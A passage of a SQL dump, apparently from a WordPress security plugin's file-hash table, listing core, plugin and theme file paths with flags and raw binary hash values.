J�����;uz','wp-includes/sitemaps/class-wp-sitemaps-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V:�L��a��MI�','��:��j�PPM\r�����8��demQ��I���c','',0,'?'),('	P=N>��b\"j:~[Q{�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�We⎆?��N��t','n4��<��Fz������_�5��kig�','',0,'?'),('	X�t\\4vNI5��j��','wp-admin/async-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q5K�e�Ź\\T#r�\0','ҍ���٢����ޞ+n��\0�o5Ox+r���d�','',0,'?'),('	`���>�R�J�,�.�','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')e��f�#�`P�~7�n','-m��z��n�N�F�E\0ѭ\\vq�sL?�Z\Z��','',0,'?'),('	t]�9��\'�����','wp-includes/blocks/nextpage/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+���v?����i6','w9>w�B���Wv���،Q�_��®�\n','',0,'?'),('	v�g��_\r�����z�','wp-includes/blocks/comments-pagination/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e������)FyD�','��*�\"�����eF1���x�j�����t�G��','',0,'?'),('	���RL��6�L�n�','wp-content/plugins/redirection/locale/redirection-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�� �H�P��XA�x','|��S��hk�r��A5#��-�\n��>�Bɗ','',0,'?'),('	�h�Xk%�>���{N�B','wp-includes/js/dist/viewport.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<��πZ ���','c%��;����`�|������fs�+���g�','',0,'?'),('	��8�a�^�N�a�!','wp-includes/wp-includes/js/codemirror/htmlhint-kses.js',0,'��[��k[�#cLf{','��[��k[�#cLf{','�N��&�V\Z�A��/��R#~բ���_J*�Ї','',0,'?'),('	�.��5ua�WkJ��','wp-includes/Requests/Exception/HTTP/413.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��2ɑI�W�v�MZ','\r��}�䟹-V�����\'eCCʅ�e-2,0','',0,'?'),('	��\r�Yk�cJ[��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/StreamWrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��/\'	�t���-�','G#(��w�K��&;�/C�1�p��\0κ?�S�','',0,'?'),('	ɑ#Xlb���f����','wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php',0,'��T�Ԧʙ`�P��L','��T�Ԧʙ`�P��L','�b=�-.���X�����T���Yn���P��','',0,'?'),('	Ӱꅑ��������c','wp-includes/js/dist/escape-html.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��hԛ�[+�;','šo�oe�Dg\0��L��<�W�ܨ�XT�\"���','',0,'?'),('	�9��fވU�f���','wp-includes/js/tinymce/tinymce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl����̡C��kn','�Zk�	�6|��{�*\Z��{�H����iܝk^','',0,'?'),('	��Ih�B�pO','wp-includes/blocks/heading/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WK5���G�Œj��',':��L�7����4�L0��s�#�G�\n�h�','',0,'?'),('	����09��-b��ͩW','wp-admin/network/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�G�\'\Z��y7��}��','Ѩ��s�]�e|T��xg�G#m�<��]��','',0,'?'),('	�/�?��^��E�Ց','wp-includes/sitemaps/class-wp-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U櫹u��B@�K^A�','�d����G��\"�\"l���2T��oy\0BE�','',0,'?'),('	�D��wv�W��F�','wp-content/plugins/wp-smushit/app/pages/class-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d;6߳RO�r�^���','���P�D�C�1�ŝ0�:j���oqG\0u�B','',0,'?'),('	�c-^q͗�j� o�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/ClientException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��7`�cZ���','ti�����˜n �O/�\"\0kߓ�A/��.��','',0,'?'),('\n��5�U�{�/\rr','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-dashicons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q/	�Wj�D�)|','�xETz�������Nҿ_��\n�߳���9','',0,'?'),('\n�	6��4R�9���','wp-includes/blocks/social-links/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7cF��@۵�S5�X�','���vqamՠ��vKa�V�ټ�Y�PŠ�Dˤ','',0,'?'),('\n��d�HWJ���� %','wp-content/plugins/wordpress-seo/src/integrations/admin/configurationworkout-notice-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y+-�}z���9��r)','Xj�\0H�m�w��/�<݇��༩\r�L7C�K','',0,'?'),('\n#Xܲu�n/�Y&d�','wp-content/themes/hitmag/inc/kirki/modules/css/field/class-kirki-output-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꁪ\Z�t]}�i��\'�','8p�;���q��W����)��|��ƺd�8窋','',0,'?'),('\n\"�\'�࡛���ܹ�','wp-includes/blocks/blocks-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[���H1P	�Z��}','�8i>�*�`�V��I!Գ]�?��\\�\"���Jc','',0,'?'),('\nB��&�4u���B?�','wp-includes/wp-includes/sodium_compat/lib/php72compat.php',0,'AG�\Zˢ;�������l','AG�\Zˢ;�������l','�D^�Y���\n�����%P+�0��[�x�~��','',0,'?'),('\nT��/\\9$Y�U\n��͌','wp-includes/customize/class-wp-widget-form-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�D*@6�{τ}��','�+֓zi���@����^F%5�qZg<��','',0,'?'),('\nf���Y��4&�L�','wp-admin/images/se.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȔB�`��.}\'7:','Y������\"K��{�U���r�:2��JL���','',0,'?'),('\nz�ŭ�}�{�.�u[�','wp-includes/block-supports/generated-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�T������$�5`�','7{���v�>���R�;‚�^�����4Q�eu','',0,'?'),('\n{X%N8Ÿw�2?M4C�','wp-includes/css/dist/format-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׎�DŽ���(��(i1�','QW��,V\\v.	>�ǖ�����^M���K�','',0,'?'),('\n}��\'٩B�3�9�:�','wp-includes/blocks/table/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�ek����J\'=','�Y�%+\'u����4z���5%<\Z������','',0,'?'),('\n�ؾ��m,A�>��bG','wp-content/plugins/wordpress-seo/packages/js/images/local_assistant.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�e]|��y�d�','��u�z{jë|_O\r�G�w\"\r�\0�8��5L','',0,'?'),('\n���f�Ӆ;{�t��','wp-includes/class-wp-role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*|<3�rHs�6�G��','��{!џ�a��mT�>T��l�A��R9]�O\Z','',0,'?'),('\n��\'�G�~R*��dj�','wp-content/plugins/redirection/models/action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����0kӂY�','I�\01���씟��>7t�)\"�\rϰ�w��K','',0,'?'),('\n��B�/��ޕ6h9g','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_PT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iՍf��lFb�\Z��','C��S3n��w_��#m٠!!R�_�����2','',0,'?'),('\n���b-�V�:��|m��','wp-admin/edit-link-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!+�5?ӗ�	:8��',';Y��-Y��7�0o�)D2r��Lj�����#p��','',0,'?'),('\n�����\\���}�[(��','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-start@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f墟*��-���i�','�ȪC�)��]�]聑����?��\n��=9�','',0,'?'),('\n�����#���x|]','wp-includes/blocks/site-tagline/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',=��SPE��ҧ��','ʈ�	�ؿߥ��~��E��k��,f����f�R','',0,'?'),('\n��NNM��ۑ4;�p�4','wp-includes/js/customize-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	|ȝ��.�(�2','������:|U�%}�[�A�bt���|ċ������','',0,'?'),('\n���Q��wЗƼ��','wp-content/plugins/wordpress-seo/src/actions/indexing/post-link-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','АU�.P����P>��','�I�q��g�ɺ:���k<�FQ�:m^�*�.�p','',0,'?'),('\n�$�;�S���+�݂','wp-content/plugins/wp-fastest-cache/css/fonts/db/Flaticon.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}e�~S�����@��','�Je����&9ͪ�j���5Rt�g<\']+zo��q','',0,'?'),('\n��4�)i��R��O�','wp-content/plugins/wp-cerber/assets/flags/ms.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wk��O�� �Yc�','�s;����ℕ�	���(�_�3t�ą�\0@�E�','',0,'?'),('\n�h�c�F9F���\rP#','wp-content/plugins/wp-smushit/app/common/meta-box-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��V��\n]2�E�3�s','�\Z9�mn��x��`�J��x�&{R��k��>���','',0,'?'),('\n�\r��:�n#�pJ�yX','wp-includes/wp-includes/css/dist/format-library/style.css',0,'�\Z۹��Pf!�\'D��','�\Z۹��Pf!�\'D��','V���h��?����a�M��ݗ4�{�\0','',0,'?'),('\n�	��_{�����','wp-includes/blocks/audio/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0��o���b~��)8','v�{G�dT��*ȡ�����R[<�4C��','',0,'?'),('\n��h�c+�T%\0y[H','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/LimitStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#Lc��{	[%VYc','*Ƞ��v3�?	s>M�W:��,�[]f\"\n����','',0,'?'),('\n���w�t��.	���','wp-content/plugins/wordpress-seo/admin/class-option-tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��S�A���ސ>A�5�','�T���Gz�\Z��A�z�����]�W0�$�X>','',0,'?'),('\n�@�g��+T;V��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f���\r@)��뻚','�;����_I��m�1�����\n�9|!޶��','',0,'?'),('\n�N����J�\'','wp-content/plugins/redirection/models/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c���A�S�e�􌁢�z','Xr�\'��k�U��\\\\��x�$�r�����)��','',0,'?'),('\n�\r�B��p̭','wp-admin/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�AD�O���*��','/�č��I�:a��q��Zy�	�gWkΞ�q','',0,'?'),('\n��:�X2�L��nc','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�z��p���(�,','��,����%u\Z��Rz�B�\r#��~�+`�5y�','',0,'?'),('\n�Gƙn��\Z@1+U]�','wp-admin/css/revisions.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؾ�§Ae]E��r�','Ȟ�p��f��͑��(�`^Ɣ�4��P7@�','',0,'?'),('̱7��e�|�hȜx�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�� �An�gKGi�','��LE������r/�g����ɣ�\'l�Q�!��','',0,'?'),('�c{���� �C��[','wp-includes/wp-includes/js/mediaelement/wp-playlist.min.js',0,'����3|G^�cKT\"�','����3|G^�cKT\"�','\'�e\"ʌ�_(n��f��ww�\Z�N�2�+ ','',0,'?'),('\"w%�_��K\\��u�','wp-admin/images/wpspin_light.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('&c�YD�#�P{+��','wp-includes/js/jquery/ui/effect-blind.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*i<z��{���5�','+��� H�����j�7��8_���z@�V','',0,'?'),('\'����i���','wp-content/plugins/wp-smushit/_src/scss/resize-detection.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F0\0���і�I1B�~','���/#�d]�<yC�_>ORY����7�>�L� M�','',0,'?'),('0����dI�+�ȿ%','wp-content/plugins/wp-cerber/assets/flags/cv.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�`;��2w���(N','�sC�h47UPs<�nG:�&��C]��d��.�','',0,'?'),('1�\r{ц�nDe��P]�','wp-includes/blocks/home-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vGҰYC[f�SEP��b','4$�5�ђ�CT��|�G���ؕUԕ�G','',0,'?'),('2��M\'�L��L_|�̨','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/author-archive-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���y��z�UjBC','�Zp*Y�\Zt3O@+���tQ���G����','',0,'?'),('A`�k{�n���/*ScN','wp-includes/js/dist/vendor/react-dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ӓ�	rq����','E=)sI쇌�l[��7#���yJ�X�2�k�K','',0,'?'),('O�u0�G����','wp-content/plugins/wordpress-seo/src/conditionals/schema-blocks-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�H�x	{�wW�� �D','F��2Tx��WdJ2���A��A4>W','',0,'?'),('P�h�ui8V��\0kU�','wp-includes/blocks/post-date/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��P�a��(P','�a%�~�ψ�Q�\\�{\ng�V6�}��_vׯ�','',0,'?'),('Y]�<N�m��%�','wp-includes/wp-includes/js/dist/viewport.min.js',0,'����>��`،�@�8�','����>��`،�@�8�','p�J^_��Wm�kN_���b�vc\n�����!cU�','',0,'?'),('sq�M:��5{�4� �','wp-content/themes/hitmag/inc/kirki/controls/views/code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]u�,�PB��@����','���ɫX�hNj�T=�]O֫�͖�g�y��','',0,'?'),('�����Y����q�','wp-includes/customize/class-wp-customize-partial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�)fIf8�X��KO','Im�g\0�W�?T�,m�9r���Lm�y6�@�y<','',0,'?'),('��)�)��}�*�]�','wp-content/plugins/wordpress-seo/admin/roles/class-role-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʭ �2w[�eAyb5�$','��VE���OhۃO�NWZ�.(�`��8�K�R','',0,'?'),('���,H(b�_F�O','wp-admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rW���r�� /�S֟','½g�hs����?HS<����i��(.oȒ�Ǽ��','',0,'?'),('��HVե�d��p�Vp','wp-includes/images/media/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4���\0T��̇?�','����v��)�\n�6Zl��2���В1�!+	�','',0,'?'),('�5�Å�ƌ���m�','wp-includes/block-patterns/query-standard-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','у��B��U�CL�{�','�:�Τ~���&�\r�CF��+��I�q_�e','',0,'?'),('�}��$�s_p!\'��','wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js',0,'�K�.�Aj_�m�r#i�','�K�.�Aj_�m�r#i�','\'��C��b\"B��\\�N�N���*r&.X��J','',0,'?'),('���?=�7����7�R�','wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"^U����f�i���','\"Do��$=�D�������9��1Qᜋ!\r��&�i','',0,'?'),('�V�(^ -O�\ZT0�{','wp-content/plugins/wordpress-seo/inc/class-wpseo-image-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��rh�#����~�Q�','��߳X� ���w8�(֓vXBi4\\��E���8','',0,'?'),('��#�U;5L�:�','wp-content/plugins/redirection/database/database-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N@�V�~e��~�','=�tR~�נ����#^�aAxQ�*;ν�','',0,'?'),('����sT3��k	5Y�','wp-content/plugins/wp-smushit/app/assets/images/select-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5nRtQ�Zu�\\ȗN�z�','���dyO�||�!�GA��Ǿ�#Os}�b�]','',0,'?'),('�kO��Ǜ�?((�͆','wp-content/plugins/wordpress-seo/src/helpers/import-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Bk��2F1y�s��6�','g�l�Q�!w��<��e�5�7jk���wΞ,','',0,'?'),('�\n��UN~���\0m��','wp-includes/js/codemirror/csslint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M_ϱI����l�',']�ih4F��ò�\r��U����WEK(�P�d','',0,'?'),('�{`+�������\0|','wp-includes/wp-includes/js/jquery/jquery.query.js',0,';�Xz�ǰ��wC',';�Xz�ǰ��wC','�u�g^���+��i��m���G\rF�x�i�X�','',0,'?'),('�c\"ml� �Ǟ>o','wp-admin/images/wordpress-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�%�d���g���p','�\"�u�j-QE\0��[�gL�Z5�MD�:','',0,'?'),('\0���Gwn!H����','wp-content/plugins/wp-smushit/core/modules/async/class-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��QV�²�AM�1{','ѧr��خ�+μReq��h%(����R#j��Ѧ�','',0,'?'),('�W��p���*�','wp-content/plugins/wp-smushit/core/integrations/class-abstract-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QO�0�xB,��P���',' z�p��Ʋ��?rdR�PZ\0?�2���	�','',0,'?'),('	c�vR!t��Hv�J','wp-content/plugins/wordpress-seo/src/presenters/rel-next-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a���Y(��d�{!','���	+y�U��$��:��`n�m�uwc\Z','',0,'?'),('�*х�1�-�k0��','wp-content/plugins/wp-cerber/languages/wp-cerber-es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!u���/=��','T�B>�[����Yu�\"O,�����[as\r�','',0,'?'),('$%#��_�U�_d�','wp-content/plugins/wordfence/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��|C��w@��m�','5�ã\0ӊVb�A�Ň���.Z�;Mz�q]��','',0,'?'),('*�O�������i','wp-includes/customize/class-wp-customize-media-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��=\r���J�$�','�_&�3��$���9����b��ږN���\Z*\n','',0,'?'),('=�vY�J�\\ܤV','wp-content/plugins/wp-fastest-cache/templates/preload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q��V�As�I3\rn\"�','.��j���l*,_Ӳ�[W�_/�R�4�\0z$','',0,'?'),('@�y��q�m����Ս�','wp-content/themes/hitmag/template-builder-fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\0����{��wگY�','�=�߹��S�!d��Z{��S�w��o�','',0,'?'),('CX��2��k��Cҳ�','wp-includes/wp-includes/js/wp-ajax-response.min.js',0,'/pM]�{\"@���s�:l�','/pM]�{\"@���s�:l�','�B�HQW�2����a��w��C���- Y��','',0,'?'),('D�� �2��K|&�','wp-admin/css/nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ż(�I(�����UrE�','L�Z�������\\n6��mA���/�W�Y�>','',0,'?'),('E6l�y\0�	��','wp-content/plugins/redirection/models/url/url-match.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�*�ク�����','�9�v�n�b]K��Ŋ���q� ]�\n�\\ٱ�','',0,'?'),('Kw��	��?��W��Z�','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q!��\0𭀠\'��','�W�4$a���\'x���-��Kμ�#�Z��','',0,'?'),('Q�10�����G��,','wp-includes/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x} ��pc��K�O�','(H>�0�}���8:e�)T��N�/�z�','',0,'?'),('{�M��i�i2n��6�','wp-includes/js/jquery/ui/effect-highlight.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M.�Z-|*�h�0~�A','?�T���I�!ewg�����4��;㻡ah�','',0,'?'),('�u�2�*=�\Z��]�','wp-content/plugins/wp-smushit/app/assets/images/select-arrow@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�*�W��K���iQ','af���Y��TL<�dut`0�`�9�2>P�U�','',0,'?'),('��P>�Fބ=�_�','wp-content/plugins/wordpress-seo/admin/formatter/class-post-metabox-formatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';X�3(_��/�7R%.�','(��Ur	��Q]b����E���V��k0','',0,'?'),('����\0ߒRE��\r�6','wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-options-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n|m\n�;���','<�*p�&�z��#��t٧�R���8i�\'','',0,'?'),('���s�s^G�x蔛�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/PrepareBodyMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�x����WɌ\\z','\'t~r�(72\"?쾍�Z:�C/��Ե�@oLd�','',0,'?'),('���(��f�N@囬','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',0,'1\r�\Z�Y�ܵm`���','1\r�\Z�Y�ܵm`���','~G��s��Mp�����^I�\0~\n)g�<��%��','',0,'?'),('�\r6��\Z͌�����','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L����PB����h>�','j%���P�T�}k�[j�|��a_!���QN)�۝�J','',0,'?'),('�[�U����)$�(\r�','wp-content/plugins/wp-cerber/languages/wp-cerber-nb_NO.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|=K\"Z0�=�o��','�a�0���{�5��<������p��\"�s���','',0,'?'),('������\'�[.ix��','wp-content/plugins/wp-fastest-cache/images/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Fȇ���Mr���','<�=8fS823���&��Ao�\r�\"�2����','',0,'?'),('�jZ�����V�a','wp-includes/wp-includes/js/dist/media-utils.min.js',0,'������ϱ݂I','������ϱ݂I','����Ȗ�riP]�o���+�g֯�*?=P','',0,'?'),('��A��Fk�','wp-admin/js/privacy-tools.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.X�c���\r��n','9=+*}��4-�o5��H���[L檰','',0,'?'),('���W��l\n�Sxc','wp-content/plugins/wordpress-seo/admin/class-admin-asset-location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','΃�b�A׳��W��ȑt','AL����U��k(��5Ɖ\"�M��8��ٍ�','',0,'?'),('���.Q}3��T�','wp-includes/Requests/Hooker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Pz�4ɇF*','t\r{�k�?i�k�C\nL��b�̇�Wy','',0,'?'),('�Z�u���iigԄ��','wp-includes/js/dist/nux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�>p~��C�x�','0�[�T-�`�7�^�F��4I7$%�A�R��E��D','',0,'?'),('��;X\"�`�uɜ','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-form-tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@��%u�7Ygcm&�','��}E�ֳ��$-���Lj�$���T����V�','',0,'?'),('\rR����$��-LD','wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-posttype-defaults-settings-importing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�VO\n����� T*','^�O�v<d��Ak��sq\ny�\Zӽ���<��l','',0,'?'),('\rܹ͛�}C�L��R)','wp-includes/blocks/file/view.min.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�_��Od��/|)By','��J�z=84!���qx�k���K�t���','',0,'?'),('\r\"��<�fKl:�fdH�','wp-includes/wp-includes/class-wp.php',0,'Z�I�֩�Eu&S^:�9','Z�I�֩�Eu&S^:�9','���t�D�MQ��ҊW8�����&���8','',0,'?'),('\r<��uIL��w��<Gz','wp-content/plugins/wp-smushit/core/external/free-dashboard/assets/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������aTw�=H$M','�J@s�I3!�f*0�q��\0t�}o�s;��=','',0,'?'),('\r>c�5�\"������U','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/css/selectWoo.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�\0g�Ό8�$','��1�6Ѽ�Q:Wg��ػ,�S�`n��`i','',0,'?'),('\rU�j�zh�2/�9�fM','wp-admin/js/application-passwords.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4ҹ5�^=t�CK�U�','|��$�D`�w�24ܥƎ�I��)t	�\\6','',0,'?'),('\rZ��������gG','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',0,'� �w^��]緣M','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('\rx� ��8�IG�L','wp-content/plugins/wp-cerber/assets/flags/cz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ِ�߭�1�vj)���','*@N�X�O�����C`VK��	�r0J�2��T','',0,'?'),('\rxݍ�^���\Z���<;','wp-admin/my-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�=�u͹��Z�|','kh�{�d��4M�>J�\Zn�ˊ�ж�','',0,'?'),('\rz�����D�D��','wp-content/plugins/wordfence/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�����_�','��RȆF\nD�~H�08),:llW�n�\rc��','',0,'?'),('\r����X����+�-Ta','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ �Mϼ�V_�i�	��','��U�s����D�MÙ�d��(�\0��ā�~���','',0,'?'),('\r�vN��[B��&��SL','wp-admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����S���훭Ke�','W�>�Z�$�`�;w��Y�p$�pu�R���','',0,'?'),('\r��<�:� -{��̖H','wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3°�\nᄷ�\0�a��','`	\\XO�U>8X.�f��?��m�{\nQ]�8��','',0,'?'),('\r�ҧxOz��z���h','wp-includes/class-wp-customize-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��t���џP�DK<9','��w�f��6(��pb�������$�Ui�','',0,'?'),('\r�|y}���;/$G��(','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-kirki-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�5�B9bZa�����','�I�	�;�Z�	